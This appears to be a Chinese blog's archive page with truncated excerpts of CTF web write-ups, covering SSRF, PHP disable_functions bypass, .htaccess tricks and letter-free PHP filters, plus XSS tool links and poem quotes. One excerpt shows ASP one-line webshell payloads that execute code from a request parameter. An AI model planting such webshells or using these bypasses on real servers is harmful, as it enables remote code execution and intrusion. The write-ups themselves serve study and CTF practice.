内容承接gkctf的web3。 记得之前还看过ssrf的视频结果因为看不懂就给跳过去了,😓。果然出来混迟早都是 […]
2020年5月
归档
checkin 不想说做题历程了。 题目的重点是disable_function的绕过,之前整理过笔记,是基于 […]
本文的大部分内容都是参考以下的这篇文章的: https://www.freebuf.com/articles/ […]
你没有如期归来,而这正是离别的意义。 ——海子《白日梦》 过去其实并没有真正的过去,过去就活在今天。 ——威廉 […]
代码如下: <?php if(!preg_match(‘/[a-z0-9]/is’,$_GET[‘she […]
基础 题目是有两种解法的,非预期解是反斜杠可以拼接/.htaccess内的配置项,预期解是cgi执行。这里就先 […]
easyphp 直接贴出源码: <?php $files = scandir(‘./’); foreac […]
xssee:http://web2hack.org/xssee xssee:http://evilcos.me […]
<%eval request(“c”)%> <%execute request(“c”)%& […]
决定还是整理一下,看了几篇相关文章都看不大懂,即使刚修完操作系统。其实在php代码审计2里提到过一点disab […]
